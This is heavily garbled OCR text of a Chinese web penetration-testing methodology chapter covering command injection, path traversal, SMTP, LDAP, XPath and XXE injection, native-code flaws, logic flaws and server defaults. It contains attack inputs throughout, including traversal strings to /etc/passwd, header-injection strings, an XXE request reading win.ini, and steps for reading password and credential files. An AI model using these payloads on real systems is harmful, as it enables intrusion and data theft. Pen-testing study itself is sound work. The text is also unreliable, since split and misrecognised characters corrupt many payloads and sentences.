口 可 以 将 命令 结果 重 定 问 到 Web 根 目录 下 的 一 个 文件 ， 然 后 使 用 自己 的 浏览 器 直接 获取 
结果 。 例 如 : 
dir > c:\inetpub\wwwroot\foo.txt 

(4) 一 旦 找到 注入 命令 的 方法 并 能 够 获得 命令 执行 结果 ， 就 应 当 确 定 上 自己 的 权限 〈 通 过 使 用 
whoami 或 类 似 命 令 ， 或 者 尝试 问 -个 受 保护 的 目录 写 入 一 个 无 害 文件 )。 然后 就 可 以 设法 提升 日 
己 的 权限 ， 进 而 秘密 访问 应 用 程序 中 的 敏感 数据 ， 或 者 通过 被 攻破 的 服务 需 测 试 其 他 主机 。 

(5) 如 有 果 知 道 自己 的 输入 被 提交 给 某 个 OS 命令 ,但 提交 前 面 列 出 的 攻击 字符 串 无 法 成 功 实 施 
攻击 , 那么 观察 是 否 可 以 使 用 < 或 > 字符 将 一 个 文件 的 内 容 指 问 命 令 的 输入 , 或 者 将 命令 的 输出 指 
问 一 个 文件 。 可 以 使 用 这 种 方法 读 取 或 写 入 任意 文件 的 内 容 。 如 果 知 道 或 能 够 猜测 出 被 执行 的 命 
令 ， 尝 试 注入 与 该 命令 有 关 的 命令 行 参 数 ， 以 有 利 的 方式 修改 它 的 行为 ( 例如， 指定 Web 根 目录 
中 的 输入 文件 )。 

(6) 如 果 发 现 应 用 程序 对 实施 命令 注入 所 需 的 某 些 字 符 进 行 转 义 ， 可 尝试 在 这 些 字 符 串 中 
插入 转 义 字符 。 如 果 应 用 程序 并 不 对 转 义 字符 本 里 进行 转 义 ， 束 可 以 利用 这 种 行为 避 开 应 用 
程序 的 防御 机 制 。 如果 发 现 空白 符 被 阻止 或 净化 , 就 可 以 使 用 $TFS 蔡 代 在 UNIX 平 人 台中 出 现 的 
空格 。 
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21.7.5 测试 路 径 蜗 历 


(1) 对 于 执行 的 每 次 模糊 测试 ， 检 查 在 21.7.1 市 第 3 步 中 列 出 的 路 径直 历 攻击 子 符 串 生成 的 结 
宁 。 可 以 在 Burp Intruder 中 单 击 有 效 载 人 三 列 的 顶部 ， 按 有 效 载 集 对 结果 表 进 行 分 类 ， 从 而 将 这 些 
字符 串 生 成 的 结 末 分 组 。 如 末 收 到 一 个 不 常见 的 错误 清明 ,或 者 长 度 不 正常 的 啊 应 , 手动 检查 啊 
应 ,确定 其 中 是 否 包含 特定 文件 的 内 容 或 其 他 表示 执行 了 反 第 文件 操作 的 证 据 。 

(CO) 在 解析 应 用 程序 的 受 攻击 面 的 过 程 中 ， 应 该 已 经 注意 到 了 一 些 专用 的 功能 ， 使 用 它们 可 
根据 用 户 提 交 的 输入 读 取 和 写 入 文件 。 除了 对 所 有 参数 进行 模糊 测试 外 ,还 应 极其 仔细 地 手动 测 
试 这 项 功能 ， 确 定 所 有 路 径直 历 源 洞 。 

(3) 如 有 果 某 个 参数 中 包含 一 个 文件 名 、 文 件 名 的 一 部 分 或 一 个 目录 ， 修 改 这 个 参数 的 值 ， 并 
在 其 中 搬入 任意 一 个 于 目录 和 一 个 过 历 序列 。 例 如 ， 如 有 果 应 用 程序 提交 参数 : 

file=foo/filel.txt 
那么 可 以 尝试 提交 以 下 值 : 

fi lesTo0 Dhar .TLLIeL: ExE 

如 琳 两 种 情况 下 应 用 程序 的 行为 完全 相同 , 那么 它 易 于 受到 攻击 , 渗透 测试 员 应 该 继续 以 下 
步 又 。 如 打 在 上 述 两 种 情况 下 应 用 程序 的 行为 有 所 不 同 , 那么 应 用 程序 可 能 阻止 、 删 除 或 次 化 过 
历 序 列 ， 致 使 文件 路 径 失效 。 尝 试 使 用 第 10 革 描述 的 编码 与 其 他 攻击 吉 开 过 渡 。 

(4) 如 条 前 面 在 基础 目录 中 使 用 这 历 序列 的 测试 取得 成 功 ， 答 试 使 用 其 他 序列 上 漳 到 基础 目 
录 ， 并 访问 服务 融 操 作 系统 中 的 已 知 文件 。 如 果 这 些 符 试 失败 ， 应 用 程序 可 能 在 许可 文件 访问 
前 实施 了 各 种 过 渡 或 检查 ， 应 当 进 行 深 入 分 析 ， 了 人 解 应 用 程序 实施 的 控制 以 及 是 否 可 以 避 开 这 
i 

(5) 应 用 程序 可 能 会 检查 被 请 求 的 文件 扩展 名 ， 只 人 允许 用 户 访问 特殊 类 型 的 文件 。 答 试 使 用 
空 字 市 或 换行 符 攻击 , 并 在 后 面 连接 已 知 的 、 应 用 程序 接受 的 文件 扩展 名 , 设法 避 开 过 滤 。 例 如 : 


.boot.ini%s00.jpg 
/i /etc/passwdsS0a.jpg 


(6) 应 用 程序 可 能 会 检查 用 户 提 交 的 文件 路 径 是 否 以 一 个 特定 的 文件 名 或 词根 开头 。 尝 试 将 
遍历 序列 附加 在 一 个 已 知 应 用 程序 接受 的 词根 后 面 ， 避 开 过 滤 。 例 如 : 
/images/../../../../../../../etc/passwd 
(7) 如 果 这 些 攻击 无 法 取得 成 功 ， 尝 试 组 合 使 用 几 种 测试 技巧 ， 首 先 对 基础 目录 进行 全 面 的 
测试 ， 了 解 应 用 程序 实施 的 过 滤 以 及 它 如 何 处 理 无 法 预料 的 输入 。 
(8) 如 果 能 够 读 取 服务 器 上 的 任意 文件 ， 尝 试 获取 以 下 任何 一 个 文件 ， 进 而 扩大 攻击 范围 。 
口 操作 系统 与 应 用 程序 的 密码 文件 。 
口 服务 器 与 应 用 程序 配置 文件 ， 发 现 其 他 漏洞 或 优化 另 一 次 攻击 。 
口 可 能 含有 数据 库 证 书 的 包含 文件 。 
D 应 用 程序 使 用 的 数据 源 ， 如 MySQL 数 据 库 文件 或 XML 文件。 
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口服 务 融 可 执行 页 面 的 源 代 码 ， 以 执行 搜索 漏洞 的 代码 审查 。 
口 可 能 包 售 用 户 名 和 会 话 令 牌 的 应 用 程序 日 志文 件 等 。 
(9) 如 末 能 够 与 入 服务 船上 的 任意 文件 ， 分 析 是 否 可 以 实施 以 下 攻击 ， 进 而 扩大 攻击 范围 。 
口 在 用 户 的 启动 文件 夹 中 创建 脚本 。 
口 当 用 户 下 一 次 连接 时 ， 修 改 in.ftpd 等 文件 执行 任意 命令 。 
口 在 一 个 拥有 执行 许可 的 Web 目 录 中 写 人 脚本 ， 从 浏览 厅 调 用 它们 。 








21.7.6 测试 脚本 注入 


(1) 对 于 执行 的 每 一 次 模糊 测试 ， 在 测试 结果 中 搜索 字符 串 111111 本 里 ( 即 它 前 面 没 有 其 他 
测试 字符 串 )。 在 Burp Intruder 中 ， 按 住 Shift 键 的 同时 单 击 111111 Grep 字 符 串 标题 ， 对 所 有 包含 
这 个 字符 串 的 结果 进行 分 类 , 即 可 迅速 确定 这 些 字 符 串 。 确 定 的 任何 结果 都 可 能 易于 受到 脚本 命 
令 注 入 攻击 。 

(2) 检查 使 用 脚本 注入 字符 串 的 所 有 测试 ， 确 定 所 有 包含 脚本 错误 消息 的 测试 这些 错 误 消 
息 表示 输入 被 执行 ， 但 造成 一 个 错误 ， 因 而 可 能 需要 对 测试 进行 优化 ， 以 成 功 实 施 脚 本 注入 。 

(3) 如 果 应 用 程序 似乎 易于 受到 攻击 , 通过 注入 其 他 专门 针对 应 用 程序 所 使 用 的 脚本 平台 的 命 
令 ,， 确认 漏洞 是 否 存 在 。 例 如 ， 可 以 使 用 类 似 于 模糊 测试 OS 命令 注入 时 使 用 的 攻击 有 效 载 傈 : 

system( 'ping%20127.0.0.11') 


21.7.7 ”测试 文件 包含 


(1) 如 果 在 模糊 测试 时 收 到 任何 由 目标 应 用 程序 的 基础 架构 提出 的 HTTP 连 接 , 那么 几乎 可 以 
肯定 应 用 程序 易于 受到 远程 文件 包含 攻击 。 以 单线 程 的 方式 在 有 限 的 时 间 内 重复 相关 测试 , 确定 
到 底 是 哪些 参数 致使 应 用 程序 提出 HTTP 请 求 。 

(2) 检查 文件 包含 测试 结果 ， 确 定 在 应 用 程序 的 响应 中 造成 反常 延迟 的 所 有 测试 。 在 这 些 情 
况 下 ， 可 能 应 用 程序 本 身 易于 受到 攻击 ， 但 HTTP 请 求 可 能 因为 网 络 级 过 滤 而 超时 。 

(3) 如 果 发 现 一 个 远程 文件 包含 漏洞 ， 部 署 一 台 包 含 恶 意 脚 本 ( 专门 针对 所 攻击 的 语言 而 编 
写 ) 的 Web 服 务 右 ， 使 用 和 测试 脚本 注入 类 似 的 命令 确定 脚本 是 否 被 执行 。 


21.8 测试 特殊 功能 方面 的 输入 漏洞 
除了 前 面 介 绍 的 基于 输入 的 漏洞 外 , 还 有 一 系列 漏洞 只 有 在 特殊 功能 中 才 会 表现 出 来 。 在 实 


践 下 面 的 测试 步 又 之 前 , 渗透 测试 员 痛 和 完 应 当 对 应 用 程序 的 受 攻击 面 的 评估 结果 进行 分 析 , 确定 
可 能 出 现 这 些 漏洞 的 应 用 程序 功能 ， 并 集中 精力 测试 这 些 功能 。 
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应 用 程序 解析 结 末 





图 21-9 测试 功能 方面 的 输入 漏洞 


21.8.1 测试 SMTP 注入 








(1) 对 于 与 电子 邮件 有 关 的 功能 使 用 的 每 一 个 请 求 ， 轮 流 提 交 以 下 每 个 测试 字符 溃 作 为 每 

一 个 参数 ， 并 在 相关 位 置 插 入 电子 邮件 地 址 。 如 步骤 21.7.1 所 述 ， 可 以 使 用 Burp Intruder 自 动 

完成 这 项 任务 。 这 些 测试 字符 串 已 经 将 特殊 的 字符 进行 了 URL 编 码 ， 因 此 不 需要 再 对 它们 进 
行 编 码 。 


<yoOuremail>%0aCc:<youremail> 








<youremail>%0d%s0aCc:<youremail> 
<youremail>$%S0aBcc: <youremail> 
<youremail>%0d%0aBcc:<youremail> 


%SOaDATA%SOafoo%0a%2e%0aMAIL+FROM: +<youremail>%0aRCPT+TO:+<youremail> 


%OaDATASOaFrom: +<youremail>%0aTo:+<youremail>%0aSsubject:+test%0afoc 
和 0a%S2e%S0a 


SOd%O0OaDATA%SOd%O0afoo%sOd$%0asS2e$sS0O0d$s%S0OaMAIL+FROM: +<youremalil>%0d%0OaRCPpT 
二 了 〇 :十 





<youremail>%0d%0aDATA%SOd%0O0aFrom:+<youremail>%0d$%0aTo:+<youremalil> 
%0Od%0asubject:+test%0d%0afoo%O0d%S0a%s2e%sS0d%s0a 


(2) 检查 测试 结 采 ， 确 定 应 用 程序 返回 的 所 有 错误 消息 。 如 果 这 些 错误 与 电子 邮件 功能 中 的 
问题 有 关 ， 确 定 是 否 有 必要 调整 输入 ， 以 利用 漏洞 。 

(3) 应 该 监控 指定 的 电子 邮件 地 址 ， 看 是 否 收 到 任何 电子 邮件 。 

(4) 仔细 检查 生成 相关 请 求 的 HTML 表 单 。 它 们 可 能 提供 与 服务 带 端 软件 有 关 的 线索 。 其 中 
可 能 包含 一 个 用 于 指定 电子 邮件 收 件 人 To ) 地 址 的 隐藏 或 禁用 字段 ， 可 以 直接 对 其 进行 修改 。 


21.8.2 测试 本 地 代码 漏洞 


1. 测试 缓冲 区 溢出 
(向 每 一 个 目标 数据 提交 一 系列 稍 大 于 常用 缓冲 区 大 小 的 长 字符 串 。 一 次 针对 一 个 数据 实 
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施 攻击 ， 最 大 程度 地 徐 盖 应 用 程序 中 的 所 有 代码 路 径 。 可 以 使 用 Burp Intruder 中 的 字符 块 有 效 载 
何 来 源 目 动 生成 各 种 大 小 的 有 效 载 何 。 可 以 对 下 面 的 缓冲 区 大 小 进行 测试 : 
1100 


4200 
3300C 


(2) 监控 应 用 程序 的 啊 应 ， 确 定 所 有 反 稼 现象 。 任 何 无 法 控制 的 溢出 几乎 可 以 肯定 会 在 应 用 
程序 中 造成 异 弟 ， 虽 然 远 程 诊断 问题 的 本 质 可 能 非常 困难 。 寻 找 以 下 反 稼 现象 。 
口 HTTP 500 状 态 码 或 错误 消息 ， 这 时 其 他 畸形 ( 而 非 超 长 ) 输入 不 会 产生 相同 的 结 
口 内 容 详 细 的 消息 ， 表 示 某 个 外 部 本 地 代码 组 件 发 生 故 障 。 
口 服务 希 收 到 一 个 局 部 或 畸形 啊 应 。 
口 服务 需 的 TCP 连 接 未 返回 啊 应 ， 突 然 关 闭 。 
口 整个 Web 应 用 程序 停止 啊 应 。 
口 应 用 程序 返回 出 人 意料 的 数据 , 表示 内 存 中 的 一 个 字符 串 可 能 “丢失 ”了 它 的 空 终 止 符 。 

2. 测试 整数 漏洞 

(1) 当 测 试 本 地 代码 组 件 时 ， 确定 所 有 基于 整数 的 数据 ， 特 别 是 长 度 指示 符 ， 可 以 利用 它 触 
发 整数 漏洞 。 

(2) 问 每 一 个 目标 数据 提交 旨 在 触发 漏洞 的 适当 有 效 载 傈 。 轮流 问 每 一 个 目标 数据 发 送 一 系 
列 不 同 的 什 ， 分 别 表示 不 同 大 小 的 有 符号 与 无 符号 整数 值 的 边界 情况 ， 如 下 所 示 。 

口 0x7f 与 0x80 (127 与 128 ) 

口 0xff 与 0x100 (255 与 256) 

口 0x7ffff 与 0x8000 (32 767 与 32 768 ) 

口 0xffff 与 0x10000 ( 65 535 与 65 536) 

口 0x7fffffff 与 0x80000000 (2 147 483 647 与 2 147 483 648 ) 
口 0xffffffff 与 0x0 ( 4 294 967 295 与 0 ) 

(3) 当 被 修改 的 数据 以 十 六 进 制 表示 时 ， 应 该 发 送 每 个 测试 字符 串 的 little-endian 与 
big-endian 版 本 ， 例 如 ，ff7f 以 及 7fff。 如 果 十 六 进 制 数字 以 ASCII 形 式 提 交 ， 应 该 使 用 应 用 程序 自 
吴 使 用 的 字母 了 字符， 确保 这 些 字 符 被 正确 编码 。 

(4) 如 21.8.2 市 第 1 步 的 (2) 所 述 ， 监 控 应 用 程序 的 响应 ， 查 找 所 有 有 反 党 事件 。 

3. 测试 格式 化 字符 串 漏洞 

(1) 轮流 问 每 一 个 参数 提交 包含 一 长 串 不 同 格式 说 明 符 的 字符 串 。 例 如 : 


个. 总 全- 人 总 总 人 
































笔 1 1ni 物 2 Ii1 千 3 In1 宕 4 In 1i 宪 5 i 1 针 6 1 i 名 7 ini%81ini%S9ini%Sl0in! etc... 

竺 1SIi 儿 21S1iSS31sSIS4IisIlSSisIlSOlsSiSCS7IisIiC8isiS9isiSl]O0Ois! etc... 

记得 将 $ 字 符 URL 编 码 成 $25。 

(2) 如 21.8.2 厄 第 1 步 的 2) 所 述 ， 监 控 应 用 程序 的 啊 应 ， 查 找 所 有 有 反常 事件 。 
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21.8.3 测试 SOAP 注 入 


(1) 轮流 测试 怀疑 通过 SOAP 消 息 处 理 的 参数 。 提 区 一 个 恶意 XML 结束 标签 ， 如 </foo>。 没 
有 发 生 错 误 就 表示 该 输入 可 能 没有 插 人 SOAP 消 息 中 ， 或 者 以 某 种 方式 被 净化 。 

(2) 出 现 错误 就 提交 一 对 有 效 的 起 始 与 结束 标签 ， 如 <foo></foo>。 如 果 这 对 标签 使 错误 消 
失 ， 应 用 程序 很 可 能 易于 受到 攻击 。 

(3) 如 果 提 交 的 攻击 字符 串 在 应 用 程序 的 啊 应 中 原样 返回 ， 轮 流 提交 下 面 两 个 值 。 如 果 发 现 
其 中 一 个 值 的 返回 结果 为 另 一 个 值 ， 或 者 只 是 返回 test， 那 么 可 以 确信 该 输入 被 插入 到 了 XML 
消息 中 。 


test<foo/> 


























test<foo></foo0o> 

(4) 如 果 HTTP 请 求 中 包含 几 个 可 放 入 SOAP 消 息 中 的 参数 ,尝试 在 一 个 参数 中 插入 起 娘 注 释 
字符 <!--， 在 为 一 个 参数 中 插入 结束 注释 字符 !-->。 然 后 ， 轮 换 在 参数 中 插入 这 两 个 字符 ( 因 
为 无 法 知道 参数 出 现 的 顺序 )。 这 样 做 可 能 会 把 服务 从 SOAP 消 息 的 某 个 部 分 作为 注释 处 理 , 从 而 
改变 应 用 程序 的 逻辑 ， 或 者 形成 一 个 可 能 造成 信息 泄露 的 错误 条 件 。 











21.8.4 ”测试 LDAP 注入 


(1) 在 任何 使 用 用 户 提 交 的 数据 从 一 个 目录 服务 中 获取 信息 的 功能 中 ,针对 每 一 个 参数 ， 轮 
流 测试 是 否 可 以 注入 LDAP 查 鹿 。 

(2) 提交 * 字 符 。 返 回 大 量 结果 就 明确 表示 针对 的 是 LDAP 查 询 。 

(3) 尝试 输入 大 量 闭 括号 : 

站 

这 个 输入 会 使 查询 语法 失效 ， 因 此， 如 果 它 导致 错误 或 其 他 反常 行为 ,那么 应 用 程序 易于 受 
到 攻击 (许多 其 他 应 用 程序 功能 和 注入 情况 也 会 造成 相同 的 结果 )。 

(4) 洋 试 输入 干扰 不 同 查 询 的 各 种 表达 式 ， 看 是 否 影 响 返 回 的 结果 。 在 查询 目录 未 知 的 情况 
下 cn 非常 有 用 ， 因 为 所 有 的 LDAP 实 现 都 支持 这 个 特性 。 

ris 


ne 


*)) 多 O00 
(5) 答 试 在 输入 结尾 增加 其 他 属性 ， 并 用 去 志 分 隔 这 些 必 性。 轮流 测试 每 一 个 属性 ， 返 回 错 
误 消 息 就 表示 该 属性 当前 无 效 。 以 下 属性 常用 在 由 LDAP 奋 询 的 目录 中 : 


ll 


























GC 

mail 
Glvenname 
oO 

OU 


dc 


21.8 测试 特殊 功能 方面 的 输入 漏洞 617 


uid 
objectclass 
postaladdress 
dn 

Sn 


21.8.5 测试 XPath 注入 
(1) 答 试 提交 下 面 的 值 ， 并 确定 它们 是 否 会 使 应 用 程序 的 行为 发 生 改 变 ， 但 不 会 造成 错误 : 








! or Count (parent::*[pPosition()=1])=0 or 'a'='b 
! Or count (parent::*[position{})}=1]})}>0 or 'a'='b 
(2) 如 果 参 数 为 数字 ， 尝 试 提交 下 面 的 测试 字符 串 : 

1 or count (parent::*[position{()=1]}=C 

1 or count (parent::*[position()=1]}>C 





(3) 如 琳 上 面 的 任何 字符 串 导 致 应 用 程序 的 行为 发 生 改变 ,但 不 会 造成 错误 ,很 可 能 可 以 通 
过 设计 测试 条 件 , 一 次 提取 一 字 市 的 信息 ,从 而 获取 任意 数据 。 使 用 一 系列 以 下 格式 的 条 件 确 定 
当前 市 皮 的 父 节 点 的 名 称 : 








substring (name (parent::*[position(}=1]}),1,1})='a’ 
(4) 提取 出 父 节 点 的 名 称 后 ， 使 用 一 系列 下 列 格 式 的 条 件 提取 XML 树 中 的 所 有 数据 。 
substring{//parentnodename [Position(}=1]/chilGd::nodel(}) [positiont{()=1. 


/text(),1,1)='a' 
21.8.6 测试 后 站 请 求 注入 


(1) 确定 在 参数 中 指定 内 部 服务 需 名 称 或 耻 地 址 的 任何 情况 。 提 交 任 意 服务 需 和 端口 ， 监 视 
应 用 程序 是 否 出 现 超时 。 还 可 以 提交 localhost， 然 后 提交 自己 的 卫 地 址 ,之 后 在 指定 端口 上 监 
视 传 人 连接 。 

(2) 针对 根据 特定 值 返回 特定 页 面 的 请 求 参 数 ， 尝 试 使 用 以 下 各 种 语法 附加 新 的 注入 参数 : 

%26foo0%3dbar (URL 编码 的 &foo=bar ) 

%3bfoo%3dbar (URL 编码 的 ;fo00=bar ) 

%2526foo%253dbar( 双重 URL 编 码 的 &foo=bar ) 

如 果 应 用 程序 的 行为 与 未 修改 原始 参数 时 相同 ， 说 明 其 中 可 能 存在 HTTP 参 数 注 入 漏洞 。 这 
时 ， 可 通过 注入 可 能 更 改 后 端 逮 辑 的 已 知 参数 的 名 / 值 对 来 攻击 后 端 请 求 〈 如 第 10 章 所 述 ) 。 
































21.8.7 ”测试 XXE 注 入 


如 果 用 户 正 回 服 务 需 提交 XML， 则 可 以 实施 外 部 实体 注入 攻击 。 如 有 果 已 知 会 回 用 户 返 回 某 
个 字段 ， 可 以 尝试 指定 一 个 外 部 实体 ， 如 下 所 示 : 
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POST /search/128/AjaxSearch.ashx HTTP/1L .1 
Host: mdsec.net 











Content-Type: text/xml; charset=UTF-8 
Content~Length: 115 


<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///windows/win.ini" > ]> 
<Search><SearchTerm>&xxe;</SearchTerm></Search> 


如 果 找 不 到 已 知 字段 ， 可 以 将 “http://192.168.1.1:25” 指 定 为 外 部 实体 ， 并 监视 页 面 
啊 应 时 间 。 如 果 页 面 啊 应 的 时 间 明 显 增长 或 页 面 超时 ， 则 说 明 应 用 程序 易于 受到 攻击 。 


21.9 测试 逻辑 缺陷 


21.9.1 确定 关键 的 受 攻 击 面 








21.9.2 测试 
多 阶段 过 程 





图 21-10 测试 逻辑 缺陷 


21.9.1 确定 关键 的 受 攻 击 面 


(1) 逻辑 缺陷 的 形式 多 种 多 样 ， 并 且 可 能 存在 于 应 用 程序 功能 的 每 一 方面 。 为 确保 探查 逻辑 
缺陷 的 效率 ， 首 先 应 该 将 受 攻 击 面 缩小 到 一 个 适当 的 范围 ， 以 方便 手动 测试 。 
(2) 检查 应 用 程序 解析 过 程 中 获得 的 结果 ， 确 定 以 下 情况 。 
口 多 阶段 过 程 。 
口 重要 的 安全 功能 ， 如 登录 。 
口 信任 边界 的 转换 〈 人 例如， 登录 时 由 匿名 用 户 转 变 为 自我 注册 用 户 )。 
口 检查 和 调整 交易 价格 或 数量 。 








21.9.2 ”测试 多 阶段 过 程 


(1) 如 采 一 个 多 阶段 过 程 需要 按 预 定 的 顺序 提交 一 系列 请 求 ， 答 试 近 其 他 顺序 提交 这 些 请 
求 。 答 试 完 全 省 略 茶 些 阶 段 ， 几 次 访问 同一 个 阶段 ， 或 者 推 后 访问 前 一 个 阶段 。 

(2) 这 些 阶段 可 能 通过 一 系列 指向 特殊 URL 的 cET 或 PosT 请 求 进行 访问 , 或 者 需要 问 同 一 个 
URL 提 交 不 同 的 参数 。 被 访问 的 阶段 可 通过 在 被 请 求 的 参数 中 提交 功能 名 称 或 索引 来 指定 。 确保 
完全 了 解 应 用 程序 访问 不 同 阶段 所 使 用 的 机 制 。 
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(3) 除了 打 乱 操作 步骤 的 顺序 外 ， 尝 试 提取 在 一 个 过 程 阶段 提交 的 参数 ， 并 在 为 一 个 阶段 提 
区 这 些 参数 。 如 果 相 关 数 据 被 应 用 程序 更 新 , 应 当 确定 是 否 可 以 利用 这 种 行为 破坏 应 用 程序 的 
馆 辑 。 

(4) 如 琳 在 一 个 多 阶段 过 程 中 ,不同 的 用 户 对 同一 组 数据 进行 操作 ， 提 取 某 一 名 用 户 提 交 的 
每 一 个 参数 ， 再 由 男 一 名 用 户 提 交 这 些 参数 。 如 采 应 用 程序 接受 并 处理 这 些 参数 ， 如 前 面 所 述 ， 
探索 这 种 行为 的 衍生 效果 。 

(5) 根据 执行 功能 的 情形 ，T 了 解 开 发 者 做 出 的 假设 以 及 主要 受 攻击 面 位 于 何 处 。 设 法 找到 违 
反 这 些 假 设 以 在 应 用 程序 中 造成 反 背 行为 的 方法 。 

(6) 如 琳 不 按 顺 序 访问 多 阶段 功能 ， 应 用 程序 党 第 表现 出 一 系列 寞 第 现象 ， 如 变量 值 为 空 字 
和 从 或 未 被 初始 化 ,状态 仅 部 分 定义 或 相互 矛盾 ,以 及 其 他 无 法 预料 的 行为 。 寻 找 有 用 的 错误 消息 
和 调试 结 有 末 , 可 以 通过 它们 进一步 了 解 该 功能 的 内 部 机 制 ， 从 而 调整 当前 攻击 , 或 者 发 动 为 一 次 
攻击 。 


21.9.3 测试 不 完整 的 输入 


(1) 应 用 程序 的 重要 安全 功能 需要 处 理 大 量 用 户 提交 的 输入 ， 并 根据 这 些 输入 做 出 决 沫 。 因 
此 ， 应 测试 这 些 功 能 对 不 完整 输入 的 适应 性 。 

CO) 轮流 测试 每 一 个 参数 ， 从 请 求 中 删除 参数 的 名 称 与 值 。 监 控 应 用 程序 的 啊 应 ， 查 找 所 有 
行为 异 帝 或 错误 消息 ， 它 们 可 能 提供 与 应 用 程序 逻辑 有 关 的 信息 。 

(3) 如 条 所 操纵 的 请 求 属于 一 个 多 阶段 过 程 ， 应 测试 整个 过 程 ， 因 为 应 用 程序 可 能 将 前 一 个 
阶段 的 数据 保存 在 会 话 中 ， 然 后 在 后 一 个 阶段 处 理 。 















































21.9.4 测试 信任 边界 


(1) 了解 应 用 程序 如 何 处 理 不 同 用 户 信任 状态 之 间 的 转换 。 寻 找 功 能 ， 帮助 一 名 拥有 特定 信 
任 地 位 的 用 户 累 积 一 定量 与 其 身份 有 天 的 状态 , 例如 ,匿名 用 户 在 目 我 注册 过 程 中 提供 个 人 信息 ， 
或 者 完成 旨 在 确认 其 号 份 的 账户 恢复 过 程 。 

(2) 寻找 办 法 ， 通 过 在 一 个 区 域 积 累 相 关 状 态 ， 在 信任 边界 之 间 进 行 不 恰当 的 转换 ， 然 后 以 
正常 不 被 允许 的 方式 切换 到 为 一 个 区 域 。 例 如 ， 完 成 部 分 账户 恢复 过 程 后 ， 和 尝试 切 换 到 与 某 一 
名 用 户 有 关 的 通过 验证 的 页 面 。 当 进行 这 种 转换 时 ， 测 试 应 用 程序 是 否 分 配 了 一 个 不 相称 的 信 
任 级 别 。 

(3) 确定 是 否 可 利用 更 高 权限 的 功能 直接 或 间接 访问 或 者 猜测 茶 些 信息 。 












































21.9.5 ”测试 交易 逻辑 

(1) 如 琳 应 用 程序 设置 交易 限额 , 测试 提交 人 负 值 会 造成 什么 影响 。 如 琳 应 用 程序 接受 负 值 ， 
束 可 以 通过 从 反方 中 进行 大 额 交 易 来 规 吉 这 种 限额 。 

(2) 分 析 是 否 可 以 使 用 一 连 串 的 交易 达成 一 种 状态 ,然后 利用 它 达 到 目的 。 例 如 ， 测 试 是 否 
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可 以 在 账户 之 间 进 行 几 次 低 额 转账 ， 就 可 以 产生 一 种 应 用 程序 的 逻辑 将 会 阻止 的 较 大 余额 。 

(3) 如 果 应 用 程序 根据 用 户 控制 的 数据 或 操作 确定 的 标准 调整 价格 或 其 他 敏感 价值 ， 首 先 应 
了 解 应 用 程序 使 用 的 算法 以 及 需要 调整 的 逻辑 。 确 定 这 些 调整 是 一 次 性 行为 , 还 是 需要 根据 用 户 
执行 的 其 他 操作 进行 修改 。 

(4) 努力 想 办 法 操纵 应 用 程序 的 行为 ， 使 应 用 程序 进行 的 调整 与 开发 者 最 初 设 定 的 标准 相互 
逆 盾 。 


21.10 测试 共 训 主机 漏洞 























21.10.1 测试 共 架构 之 间 的 隔离 


21.10.2 测试 使 用 ASP 主 机 的 应 用 程序 之 间 的 隔离 








图 21-11 测试 共享 主机 漏 酒 


21.10.1 测试 共享 基础 架构 之 间 的 隔离 


(1) 如 果 应 用 程序 在 一 个 共享 基础 架构 中 运行 ,分析 它 为 共享 环境 中 的 客户 疹 提 供 的 用 于 更 
新 和 管理 其 内 容 与 功能 的 访问 机 制 。 考 虑 以 下 问题 。 
口 远程 访问 机 制 是 否 使 用 一 个 安全 的 协议 与 经 过 适当 强化 的 基础 架构 ? 
口 客户 端 是 否 能 够 访问 他 们 正常 情况 下 不 能 访问 的 文件 、 0 
口 客户 端 是 否 能 够 在 主机 环境 中 获得 一 个 交互 式 的 shell， 并 执行 任意 命令 
(2) 如 果 使 用 一 个 所 有 权 应 用 程序 ， 以 方便 客户 端 配 置 和 定制 共享 环境 ， 0 
个 应 用 程序 为 攻击 目标 ， 攻 破 该 环境 本 身 以 及 其 中 运行 的 所 有 应 用 程序 。 
(3) 如 果 能 够 在 某 个 应 用 程序 中 执行 命令 、 注 入 SQL 脚 本 或 访问 任意 文件 ， 仔 细 研 究 ， 看 是 
否 能 够 以 此 扩大 攻击 范围 ， 攻 破 其 他 应 用 程序 。 


21.10.2 ”测试 使 用 ASP 主 机 的 应 用 程序 之 间 的 隔离 


(1) 如 果 使 用 ASP 主 机 的 应 用 程序 由 许多 共享 与 定制 组 件 构 成 ， 确 定 其 中 的 任意 共享 组 件 ， 
如 日 志 机 制 、 管 理 功能 以 及 数据 库 代 码 组 件 ， 尝 试 利用 这 些 组 件 攻破 应 用 程序 的 共享 部 分 , 进而 
攻破 其 他 应 用 程序 。 

(2) 如 果 共 享 环境 使 用 一 个 常用 的 数据 库 ， 使 用 NGSSquirrel 之 类 的 数据 库 扫 描 工 具 ， 全 面 审 
查 数据 库 配置 、 补 丁 版 本 、 表 结构 以 及 许可 。 数 据 库 安全 模型 中 存在 的 任何 缺陷 都 可 加 以 利用 ， 
将 攻击 范围 由 一 个 应 用 程序 扩大 到 另 一 个 应 用 程序 。 
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21.11 测试 Web 服务 器 漏洞 


21.11.1 测试 默认 证 书 


21.11.2 测试 默认 内 容 


21.11.3 测试 危险 的 HTTP 方 法 


21.11.4 测试 代理 功能 


21.11.5 测试 虚拟 主机 配置 不 当 





21.11.6 测试 Web 服 务 絮 软件 漏洞 


21.11.7 测试 Web 应 用 程序 防火 墙 





图 21-12 ”测试 Web 服 务 器 漏洞 


21.11.1 测试 软 认 证 书 


(1) 检查 应 用 程序 解析 过 程 中 获得 的 结果 ， 确定 应 用 程序 使 用 的 、 可 能 包含 可 访问 的 管理 接 
口 的 Web 服 务 侣 与 其 他 技术 。 

(2) 对 Web 服 务 右 进行 端口 扫描 ， 确 定 在 指 疝 主 目标 应 用 程序 的 不 同 端 口上 运行 的 所 有 管理 
接口 。 

(3) 对 于 确定 的 接口 ， 查 阅 制造 丙 文 档 资 料 与 第 用 默认 密码 表 ， 获 得 默认 证 书 。 

(4) 如 果 软 认证 书 无 效 ， 使 用 21.4 节 描述 的 技巧 答 试 猜测 有 效 的 证 书 。 

(5) 如 果 能 够 访问 管理 接口 ， 审 查 可 用 的 功能 ， 确 定 是 否 可 以 利用 这 项 功能 进一步 攻破 主机 
与 主 应 用 程序 。 

















21.11.2 ”测试 默认 内 容 


(1) 分 析 Nikto 扫 摘 结 来 (21.1.4 广 中 的 第 1 步 )， 确 定 服务 郁 上 存在 的 、 但 并 不 属于 应 用 程 
序 的 默认 内 容 。 

(2) 使 用 搜索 引擎 与 其 他 资源 ( 如 www.exploit-db.com ) 确定 已 知 应 用 程序 所 使 用 的 技术 的 默 
